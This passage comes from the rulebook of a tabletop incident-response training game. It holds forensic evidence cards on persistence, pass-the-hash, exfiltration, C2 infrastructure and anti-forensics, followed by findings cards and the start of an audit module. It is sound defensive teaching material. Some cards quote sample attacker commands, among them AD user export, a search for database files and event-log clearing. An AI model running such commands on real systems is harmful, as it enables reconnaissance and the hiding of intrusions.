║ - Executes: C:\Windows\System32\msupd.exe (hidden location) ║
║ ║
║ What It Reveals: ║
║ - Attacker skill level (simple but effective) ║
║ - Intent: Long-term access/persistence ║
║ - Sophistication: Low-to-medium (persistence is basic) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - Task definition stored in XML (Windows registry/filesystem) ║
║ - Can be exported and hashed ║
║ - Creation/modification timestamps available ║
║ - Fully admissible in court ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - DISK-01: Task files in Windows registry/filesystem ║
║ - LOG-01: Task execution appears in logs ║
║ - MEM-01: Task execution visible in running processes ║
║ - MALW-01: Dynamic analysis shows task creation ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "We found a scheduled task executing malware. Key questions: ║
║ - When was this task created? (timestamp analysis) ║
║ - What executable does it run? (acquire and analyze - MALW-01) ║
║ - Is the executable still present? (filesystem search) ║
║ - Is the task still active? (persistence threat)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +20% (clearly shows persistence phase) ║
║ - Timeline: +15% (task timestamps show when persistence installed)║
║ - Attribution: +5% (persistence technique is common) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Implement AppLocker/code signing for scheduled ║
║ task executables" ║
║ → NETWORK BUILDING: "Enable scheduled task logging and analysis"║
║ → AUDIT: "Verify controls on scheduled task creation" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-04: SUSPICIOUS ADMIN LOGIN (TIMELINE) ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Credentials & Access ║
║ MITRE ATT&CK: T1078 (Valid Accounts), T1021 (Remote Services), ║
║ T1550 (Use Alternate Authentication Material) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Administrator account login with suspicious characteristics: ║
║ - Unusual time (3 AM instead of business hours) ║
║ - Unusual location (different country/VPN) ║
║ - Unusual source (remote desktop instead of VPN) ║
║ - Batch processing (multiple logins in seconds) ║
║ ║
║ Example Log Entry: ║
║ 2024-10-15 03:22:15 - User: Administrator ║
║ Source: 192.0.2.100 (Russia) ║
║ Protocol: RDP / SSH ║
║ Success: Yes ║
║ ║
║ What It Reveals: ║
║ - Credential compromise (credentials being used by attacker) ║
║ - Privilege level compromised (admin account) ║
║ - Lateral movement likely (attacker on network now) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - Log entry with timestamp and source ║
║ - digitally signed event log ║
║ - Corroborated by other log sources ║
║ - Fully admissible in court ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - LOG-01: Event Log Analysis shows unusual logon event ║
║ - LOG-02: Correlation across multiple systems ║
║ - TIMELINE-01: Used to establish attack progression ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "Admin account was compromised. Questions to answer: ║
║ - When was the password changed? (before or after login?) ║
║ - What other logins occurred after this? (lateral movement) ║
║ - Was there any password reset? (attacker covering tracks) ║
║ - What systems did this account access? (scope of compromise)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +20% (clear escalation point) ║
║ - Timeline: +25% (login timestamp anchors timeline) ║
║ - Attribution: +10% (geolocation may hint at attacker origin) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Implement MFA on admin accounts" ║
║ → NETWORK BUILDING: "Isolate admin access to PAW" ║
║ → AUDIT: "Review admin account access controls and logging" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-05: LATERAL MOVEMENT (PASS-THE-HASH) ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Lateral Movement ║
║ MITRE ATT&CK: T1550 (Use Alternate Authentication Material), ║
║ T1110 (Brute Force), T1021 (Remote Services) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Evidence that attacker used stolen password hashes to access ║
║ other systems without knowing the plaintext password. ║
║ NTLM hash reuse across systems allows lateral movement. ║
║ ║
║ What It Shows: ║
║ - Compromised account: admin-user (hash: A1B2C3D4E5F6...) ║
║ - Lateral targets: File server, database server, backup server ║
║ - Movement pattern: Sequential access across infrastructure ║
║ ║
║ What It Reveals: ║
║ - Attack sophistication (understanding Windows auth) ║
║ - Network enumeration (attacker knew what systems exist) ║
║ - Scope of compromise (multiple systems accessed) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠ ║
║ - Hash captured from memory/SAM file ║
║ - Corroborated by network logs (successful auth events) ║
║ - Can be cryptographically validated ║
║ - Admissible with supporting evidence (network logs) ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - LOG-02: Cross-system log correlation shows pattern ║
║ - NET-01: Network traffic shows auth attempts ║
║ - MEM-01/MEM-02: Hash visible in memory ║
║ - DISK-01/DISK-02: SAM file contains hashes ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "Attacker used pass-the-hash technique. Next steps: ║
║ - Determine all systems accessed with this hash ║
║ - Check what actions were taken on each system ║
║ - Look for privilege escalation or data access on each system" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +25% (shows sophisticated lateral movement) ║
║ - Timeline: +15% (timestamps show movement sequence) ║
║ - Attribution: +15% (technique sophistication shows skill) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Implement Credential Guard, Mimikatz mitigations"║
║ → NETWORK BUILDING: "Network segmentation to limit lateral move"║
║ → AUDIT: "Verify Controls on credential reuse prevention" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-06: DATA EXFILTRATION EVIDENCE ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Exfiltration ║
║ MITRE ATT&CK: T1020 (Automated Exfiltration), T1030 (Data ║
║ Transfer Size Limits), T1048 (Exfil Over Alt ║
║ Protocol) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Evidence of large data transfer from internal network to ║
║ external attacker-controlled destination. ║
║ ║
║ Characteristics: ║
║ - Volume: 100+ GB transferred in 6-hour window ║
║ - Timing: During non-business hours (3-8 AM) ║
║ - Destination: External IP/domain (attacker server) ║
║ - Protocol: HTTPS, FTP, or custom protocol ║
║ - Pattern: Consistent data rate (not bandwidth-throttled) ║
║ ║
║ What It Reveals: ║
║ - Scope of compromise (what was accessed) ║
║ - Attacker objective (data theft vs. ransomware) ║
║ - Attack timeline (when exfiltration occurred) ║
║ - Attacker infrastructure (location of receiving server) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - Network flow logs (NetFlow, sFlow, or IDS logs) ║
║ - PCAP files with packet timestamps ║
║ - Firewall logs documenting outbound connections ║
║ - Cryptographic hashes of transferred data ║
║ - Fully admissible in court ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - NET-01: Network traffic analysis shows volume anomalies ║
║ - NET-02: Packet inspection shows data being transferred ║
║ - LOG-02: Firewall/proxy logs show external connections ║
║ - MALW-01: Dynamic analysis shows file staging before exfil ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "Massive data exfiltration detected. Critical questions: ║
║ - Exactly which files/databases were exfiltrated? ║
║ - How many customer records are affected? ║
║ - Can we identify specific data types stolen? ║
║ - Is the data still being transferred (ongoing threat)?" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +20% (confirms attacker objectives) ║
║ - Timeline: +20% (exfil duration/timing) ║
║ - Attribution: +10% (exfil infrastructure may be reused) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Data loss prevention (DLP) controls" ║
║ → NETWORK BUILDING: "Egress filtering, traffic inspection" ║
║ → DISASTER RECOVERY: "Breach notification scope (data volume)" ║
║ → AUDIT: "Data protection controls and encryption review" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-07: ATTACKER INFRASTRUCTURE MAP ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Infrastructure ║
║ MITRE ATT&CK: Related to C2 infrastructure and command channels║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Connected map of attacker-controlled infrastructure including ║
║ multiple domains, IP addresses, registrars, and services. ║
║ ║
║ Example Infrastructure Web: ║
║ - Primary C2: checkupdate.ru (IP: 192.0.2.45) ║
║ - Alternate C2: update-service.xyz (IP: 192.0.2.46) ║
║ - Malware hosting: files.example.net (IP: 192.0.2.47) ║
║ - Registrant: All registered via registrar.ru ║
║ - ASN: AS64512 (Ukrainian ISP network) ║
║ ║
║ What It Reveals: ║
║ - Attacker operational security (multiple infrastructure) ■ ║
║ - Attacker resources (ISP relationships, hosting account) ║
║ - Attacker location hints (registrar, ASN, geolocation) ║
║ - Attack history (domains registered months/years earlier) ║
║ - Other campaigns (infrastructure reused for other attacks) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠ ║
║ - WHOIS records are public but can be modified ║
║ - Historical DNS data from passive DNS services ║
║ - Correlations need cross-referencing ║
║ - Admissible with supporting evidence (traffic logs) ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - THREAT-01: Threat attribution analysis connects domains ║
║ - MALW-02: Static analysis finds hardcoded backup domains ║
║ - NET-01: Network traffic shows multiple C2 attempts ║
║ - CTI research: VirusTotal, Shodan, Passive DNS services ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "We've mapped attacker infrastructure. Next steps: ║
║ - Search threat intelligence databases for this infrastructure ║
║ - Look for connections to known threat groups ║
║ - Check if infrastructure used in other campaigns ║
║ - Contact registrar and hosting for takedown ║
║ - Report to ISP for blocking/monitoring" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attribution: +30% (infrastructure often linked to groups) ║
║ - Attack Chain: +15% (understanding attacker preparation) ║
║ - Timeline: +10% (infrastructure registration dates) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Block all known C2 infrastructure via firewall" ║
║ → AUDIT: "Threat intelligence integration for blocking" ║
║ → THREAT INTEL: Shareable with industry, law enforcement ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-08: ENCRYPTION KEYS RECOVERED ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence ║
║ MITRE ATT&CK: T1140 (Deobfuscate/Decode), T1552 (Unsecured ║
║ Credentials), T1074 (Data Staged) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Encryption keys recovered from memory, disk, or malware code ║
║ that allow decryption of: ║
║ - Malware traffic (C2 communications) ║
║ - Stolen data archives (what was exfiltrated) ║
║ - Attacker staging servers (accessing their infrastructure) ║
║ - Backdoor communications (understanding commands) ║
║ ║
║ Examples: ║
║ - AES-256 key found in malware binary ║
║ - RC4 key in process memory (used for C2) ║
║ - TLS certificates for backdoor listener ║
║ - Steganography keys (hidden messages in files) ║
║ ║
║ What It Reveals: ║
║ - Encryption strength (military-grade vs. basic obfuscation) ║
║ - Attacker sophistication (poor key management = careless) ║
║ - What data can be decrypted (scope of analysis) ║
║ - Backdoor capabilities (understanding command set) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠ ║
║ - Keys extracted from memory/binary must be documented ║
║ - Extraction methodology must be explained ║
║ - Cross-referencing with code/behavior confirms validity ║
║ - Admissible with supporting analysis documentation ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - MEM-02: Deep memory analysis finds encryption keys ║
║ - DISK-02: File carving recovers keys from slack space ║
║ - MALW-02: Static analysis finds hardcoded keys ║
║ - MALW-01: Dynamic analysis reveals keys generated at runtime ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "We recovered encryption keys! This is huge because: ║
║ - We can decrypt C2 communications (see commands sent) ║
║ - We can decrypt malware archives (understand what was stolen) ║
║ - We can access attacker staging servers (more evidence) ║
║ - We can build stronger attribution (command content)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +25% (understand full communication) ║
║ - Attribution: +20% (commands reveal attacker objectives) ║
║ - Timeline: +15% (command history shows action sequence) ║
║ - Chain of Custody: +15% (encryption is strong evidence) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Secure key management practices" ║
║ → AUDIT: "Encryption and key management controls" ║
║ → THREAT INTEL: Keys shared with law enforcement ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-09: ATTACKER COMMAND HISTORY ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Activity ║
║ MITRE ATT&CK: T1059 (Command & Scripting Interpreter), ║
║ T1059.001 (PowerShell) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Recovered history of commands executed by attacker on ║
║ compromised systems. Shows attacker's actions, objectives, ║
║ and decision-making process. ║
║ ║
║ Examples: ║
║ - PowerShell: Get-AdUser -Filter * | Export-CSV C:\temp\ad.csv ║
║ - CMD: dir \\backup-server\share ║
║ - Bash: find / -name "*.sql" -o -name "*.db" 2>/dev/null ║
║ ║
║ What It Reveals: ║
║ - Attacker objectives (looking for what? ad users? databases?) ║
║ - Attacker knowledge (familiar with Windows/Linux/networks) ║
║ - Attack sophistication (script-kiddie vs. skilled operator) ║
║ - Targeting specificity (random exploration vs. targeted search║
║ - Timeline of activities (sequence of commands shows progression)║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - Command history from shell/terminal logs ║
║ - PowerShell transcript logs (if enabled) ║
║ - Memory forensics shows running command buffer ║
║ - Timestamps document command execution order ║
║ - Fully admissible in court ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - MEM-02: Memory forensics finds recent command buffer ║
║ - LOG-02: Command execution logging (PowerShell, bash history) ║
║ - DISK-01: Shell history files (.bash_history, PowerShell logs)║
║ - MALW-01: Dynamic analysis shows commands sent to shell ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "We have the attacker's command history! This shows us: ║
║ - What systems they were looking for ║
║ - What data they searched for ║
║ - How much time they spent on each system ║
║ - When they pivoted to new systems ║
║ - When they started exfiltration ║
║ - If they set up backdoors or persistence" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Timeline: +25% (command timing shows exact sequence) ║
║ - Attack Chain: +25% (command progression shows phases) ║
║ - Attribution: +15% (command style/language hints) ║
║ - Chain of Custody: +10% (strong admissible evidence) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "PowerShell transcript logging, command audit" ║
║ → AUDIT: "Verify logging of command execution" ║
║ → TRAINING: "Identify what commands should have triggered alerts"║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-10: MALWARE BEHAVIOR PROFILE ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence ║
║ MITRE ATT&CK: Multiple TTPs based on observed behavior ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Complete profile of malware capabilities and behavior based ║
║ on dynamic analysis in sandbox environment. ║
║ ║
║ Profile Contents: ║
║ - File system interactions (creates, modifies, deletes) ║
║ - Registry modifications (persistence mechanisms) ║
║ - Process creation (parent-child relationships) ║
║ - Network communications (DNS queries, HTTP requests, IPs) ║
║ - API calls (Windows/Linux API usage) ║
║ - Anti-analysis techniques (sandbox evasion) ║
║ ║
║ Example Output: ║
║ - Name: conhost.exe (masquerading as Windows process) ║
║ - Creates files: C:\Users\*\AppData\Local\Temp\app.exe ║
║ - Registry: HKLM\Software\Microsoft\Windows\CurrentVersion\Run ║
║ (persistence) ║
║ - Network: Connects to update.badsite.ru:443 every 15 minutes ║
║ - Capabilities: Credential harvesting, File encryption, C2 ║
║ ║
║ What It Reveals: ║
║ - Complete malware capabilities ║
║ - Attacker operational techniques ║
║ - Threat level (spyware vs. ransomware vs. trojan) ║
║ - Indicators of Compromise (IOCs) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - Sandbox execution video/logs document behavior ║
║ - Timestamps and sequence recorded ║
║ - Reproducible analysis methodology ║
║ - Widely accepted malware analysis evidence ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - MALW-01: Dynamic sandbox analysis produces full profile ║
║ - MALW-02: Static analysis validates observed behaviors ║
║ - Combined: Behavior validated against code confirms accuracy ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "We have the complete malware profile. Now we can: ║
║ - Search for all instances of this malware ║
║ - Hunt for C2 communications on network ║
║ - Search for created files and artifacts ║
║ - Link to other malware families (code similarities)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +20% (understand capabilities = understand threat)║
║ - Attribution: +15% (malware signatures match known families) ║
║ - Timeline: +10% (behavior timing shows operation phase) ║
║ - Chain of Custody: +10% (sandbox logs are strong evidence) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Controls to prevent malware execution" ║
║ → NETWORK BUILDING: "Detection of malware C2 behaviors" ║
║ → AUDIT: "EDR/SIEM coverage for malware detection" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-11: FILE STAGING ARTIFACTS ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Activity ║
║ MITRE ATT&CK: T1074 (Data Staged), T1005 (Data from Local ║
║ System) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Evidence of attacker staging files before exfiltration. Files ║
║ are collected in a temporary location, compressed, encrypted, ║
║ then transferred to attacker server. ║
║ ║
║ Artifacts Found: ║
║ - Compressed archives (RAR, 7z, ZIP files) ║
║ - Partially deleted files (overwrite artifacts) ║
║ - File lists (text files naming what to steal) ║
║ - Batch scripts (automated collection scripts) ║
║ - Temporary directories with suspicious contents ║
║ ║
║ Example: ║
║ - C:\Staging\data_backup.7z (500 MB) ║
║ - C:\Staging\files_to_get.txt (list of target files) ║
║ - C:\Staging\collect.bat (automated collection script) ║
║ ║
║ What It Reveals: ║
║ - Data that was targeted (from .txt lists) ║
║ - Volume of exfiltration (archive size) ║
║ - Compression ratio (how much data actually stolen) ║
║ - Attacker knowledge (knew where sensitive data was) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - File hashes document the staging ║
║ - File timestamps show staging timeline ║
║ - File content confirms what was staged ║
║ - Fully admissible in court ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - DISK-01/DISK-02: Staging artifacts on disk ║
║ - LOG-02: Batch script execution in logs ║
║ - MALW-01: Dynamic analysis shows staging process ║
║ - NET-01: File transfer evidence (connection to staging dir) ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "Attacker staged specific files. This shows: ║
║ - Exact data that was targeted (from staging lists) ║
║ - Attack planning (targeted vs. random) ║
║ - Data sensitivity (what did they prioritize) ║
║ - Precision of attack (narrow vs. broad data grab)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +15% (staging phase evidence) ║
║ - Timeline: +20% (staging timestamps show prep phase) ║
║ - Attribution: +10% (precision shows targeting sophistication) ║
║ - Chain of Custody: +10% (file evidence is strong) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Data identification and protection (DLP)" ║
║ → AUDIT: "Data classification and access controls" ║
║ → NOTIFICATION: "Specific data breach notification" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-12: ANTI-FORENSICS EVIDENCE ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Activity ║
║ MITRE ATT&CK: T1070 (Indicator Removal), T1485 (Data ║
║ Destruction), T1556 (Modify Authentication Process)║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Evidence that attacker actively tried to cover their tracks ║
║ using anti-forensics techniques. ║
║ ║
║ Anti-Forensics Found: ║
║ - Event log deletion (Clear-EventLog PowerShell) ║
║ - File timestamp manipulation (TimeStomp) ║
║ - Log overwriting (dd commands filling logs) ║
║ - File shredding (secure deletion of evidence) ║
║ - Registry clearing (CleanMgr, CCleaner, etc) ║
║ - Malware self-deletion after execution ║
║ ║
║ What It Reveals: ║
║ - Sophistication (advanced attackers use anti-forensics) ║
║ - Awareness (attacker knew forensics would be used) ║
║ - Intent (intentional cover-up vs. accidental trail) ║
║ - What they're hiding (deleted logs = they knew activities ║
║ would be suspicious) ║
║ - Attack planning (anti-forensics in playbook = pre-planned) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠ ║
║ - Evidence is lack of evidence (absences are hard to prove) ║
║ - Comparison with known baselines shows anomalies ║
║ - Log deletion tools detected and documented ║
║ - Admissible with supporting context (other evidence) ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - LOG-01/LOG-02: Gaps in logs (suspicious absences) ║
║ - DISK-01/DISK-02: Deleted log files, anti-forensic tools ║
║ - MEM-01/MEM-02: Anti-forensic process running in memory ║
║ - MALW-01: Dynamic analysis shows self-deletion ║
║ - MALW-02: Code analysis finds anti-forensic capabilities ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "Attacker used anti-forensics. This actually helps because: ║
║ - Proves attacker sophistication (means skilled opponent) ║
║ - Indicates intentional harm (not accidental) ║
║ - Suggests what they're hiding (what logs were deleted?) ║
║ - Helps attribution (anti-forensics technique is signature) ║
║ - Can reconstruct from other sources (memory, network logs)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attribution: +20% (anti-forensic technique is signature) ║
║ - Attack Chain: +10% (shows post-attack phase) ║
║ - Timeline: -10% (anti-forensics makes timeline harder) ║
║ - Chain of Custody: +5% (proves intentional cover-up) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Immutable logging (cloud, WORM storage)" ║
║ → NETWORK BUILDING: "Centralized log aggregation" ║
║ → AUDIT: "Log integrity and anti-tampering controls" ║
╚════════════════════════════════════════════════════════════════╝
These are synthesis cards representing conclusions from forensic findings:
╔════════════════════════════════════════════════════════════════╗
║ FIND-01: THREAT ATTRIBUTION REPORT ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions ║
║ Triggered When: Attribution Confidence ≥ 70% ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING: ║
║ Attack attributed to [Threat Group Name] ║
║ Confidence Level: [60-90% based on evidence] ║
║ Associated Techniques: [MITRE ATT&CK TTPs] ║
║ Previous Targets: [Industries/organizations previously targeted]║
║ Likely Motivation: [Financial gain, espionage, etc] ║
║ ║
║ RECOMMENDATIONS: ║
║ 1. Notify law enforcement (FBI, Interpol if international) ║
║ 2. Share intelligence with industry ISACs ║
║ 3. Monitor for indicators of re-engagement ║
║ 4. Implement defenses targeting group's known TTPs ║
║ ║
║ FEEDS INTO MODULES: ║
║ → HARDENING: "Defense-in-depth against attributed group" ║
║ → AUDIT & COMPLIANCE: "Threat model update with attributed group"║
║ → INCIDENT RESPONSE: "Playbook for future incidents from group"║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ FIND-02: ATTACK SURFACE ANALYSIS ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions ║
║ Triggered When: Attack Chain ≥ 75% ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING: ║
║ Entry Point: [Method used for initial compromise] ║
║ Exploited Vulnerability: [CVE, weak auth, configuration gap] ║
║ Escalation Point: [Where privilege escalation occurred] ║
║ Lateral Movement Paths: [Systems accessed after pivot] ║
║ ║
║ ROOT CAUSE: ║
║ - [Patch missing, configuration weakness, process gap] ║
║ ║
║ RECOMMENDATIONS: ║
║ 1. Patch entry-point vulnerability immediately ║
║ 2. Implement detection for exploitation attempts ║
║ 3. Restrict lateral movement (network segmentation) ║
║ 4. Update architecture to prevent this attack path ║
║ ║
║ FEEDS INTO MODULES: ║
║ → HARDENING: "Specific technical hardening measures" ║
║ → NETWORK BUILDING: "Architecture redesign to block attack path"║
║ → AUDIT: "Control gap remediation" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ FIND-03: PERSISTENCE MECHANISMS DISCOVERED ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions ║
║ Triggered When: Multiple persistence artifacts found ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING: ║
║ Primary Persistence: [Scheduled task, registry run, etc] ║
║ Backup Persistence: [Redundant persistence methods] ║
║ Dormancy: [How long could malware remain active undetected] ║
║ ║
║ THREAT: ║
║ Attacker likely still has access (persistence remains active) ║
║ - Malware calls home regularly (C2 connections) ║
║ - Can re-establish access if initial access closed ║
║ - May deploy additional payloads over time ║
║ ║
║ IMMEDIATE ACTIONS: ║
║ 1. Fully remediate all discovered persistence mechanisms ║
║ 2. Search for backup persistence (often multiple methods) ║
║ 3. Monitor for re-establishment of access ║
║ 4. Assume attacker may have staged additional backdoors ║
║ ║
║ FEEDS INTO MODULES: ║
║ → HARDENING: "Persistence prevention and detection" ║
║ → DISASTER RECOVERY: "Scope of remediation (how deep?)" ║
║ → AUDIT: "Endpoint protection review" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ FIND-04: INVESTIGATIVE GAPS & RECOMMENDATIONS ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions ║
║ Triggered When: Investigation completes (Victory or Failure) ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING: ║
║ Key Questions Answered: ║
║ - [ ] Attack entry point identified? ║
║ - [ ] Attacker motivation understood? ║
║ - [ ] Threat actor identified (attribution)? ║
║ - [ ] Data compromised: volume and sensitivity? ║
║ - [ ] Current access status: eliminated or ongoing? ║
║ - [ ] Persistence mechanisms: removed or active? ║
║ ║
║ Remaining Questions: ║
║ - [List specific unknowns from the investigation] ║
║ - [What evidence gaps prevent complete understanding] ║
║ - [What would close these gaps (more investigation, experts)] ║
║ ║
║ NEXT STEPS: ║
║ 1. [If gaps remain: External forensics firm for deep analysis] ║
║ 2. [Law enforcement involvement for attribution/prosecution] ║
║ 3. [Threat intelligence: share findings with industry] ║
║ 4. [Lessons learned: update hardening/network architecture] ║
║ ║
║ FEEDS INTO MODULES: ║
║ → AUDIT & COMPLIANCE: "Post-incident review and control updates"║
║ → TRAINING: "Lessons learned session with all teams" ║
║ → STRATEGIC: "Investment in detection/response capabilities" ║
╚════════════════════════════════════════════════════════════════╝
Result: Quick understanding of attack progression without full attribution
Result: Complete attack narrative with attribution
Result: Expert-level forensic analysis, actionable threat intelligence
Q: Can I discover the same Evidence card twice? A: No. Each Evidence card represents a unique finding. Multiple investigations may point to the same finding (confirming it), but you only gain progress once.
Q: What if I fail an investigation? A: No Evidence discovered, but you've used a turn and Budget. You can retry next turn (costs full Budget again), or move to different investigation.
Q: How do I use Evidence Cards to support my narrative? A: Reference specific Evidence cards when describing findings to Threat Orchestrator or in debrief. Chain of Custody rating shows admissibility in court.
docs/rules/module-audit-compliance.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
v2.2: this document's modifier table is canonical — the tables in
cards/audit-compliance/are generated from it. See v2.2 Playtest Edition Changes at the bottom.
The Audit & Compliance Module teaches players how security assessments reveal vulnerabilities that attackers will eventually exploit. Teams conduct a simulated third-party audit of their IT infrastructure, discovering gaps that will matter later.
Key Concept: "Auditors find what attackers will exploit." The findings from this module either inform hardening decisions (if successful) or create additional costs (if incident occurs).
Module Teaches: - Primary: Security assessment, compliance frameworks (NIST, CIS, PCI-DSS), vulnerability discovery - Secondary: Risk prioritization, remediation planning, audit-to-action translation
Integration Point: - Can be played standalone (teams audit a pre-built network) - OR as setup for Incident Response/Disaster Recovery (audit findings modify those modules) - See module-combinations.md for recommended sequences
| Framework | Focus | Best For |
|---|---|---|
| NIST Cybersecurity Framework | 5 Core Functions | General organizations |
| CIS Critical Controls | 18 Controls (CIS v8) | Defense-focused |
| PCI-DSS | Payment card security | Retail/e-commerce |
| HIPAA | Healthcare data | Healthcare organizations |
| Multi-Framework | Mix of above | Realistic compliance |
Key Point: Framework choice determines which audit domains are tested.
Budget note (v2.2): core-rules gives the Audit module a starting Budget of 100 — Budget (100) applies only when playing the optional Remediation follow-up cards (see cards/audit-compliance/expansion-deck/compliance-frameworks.md, remediation section); the assessment itself costs nothing.
| Scope | Time | Networks Evaluated |
|---|---|---|
| Basic | 5 min | One pre-built network |
| Standard | 10 min | One network from Network Building OR pre-built |
| Comprehensive | 15+ min | Multiple networks / multiple locations |
Option A: Use Pre-Built Network - Threat Orchestrator provides a sample network - Teams audit it without having built it - Focuses on audit skills, not network design
Option B: Use Network from Network Building Module - Teams audit the network they just built - Directly see consequences of earlier decisions - More integrated experience
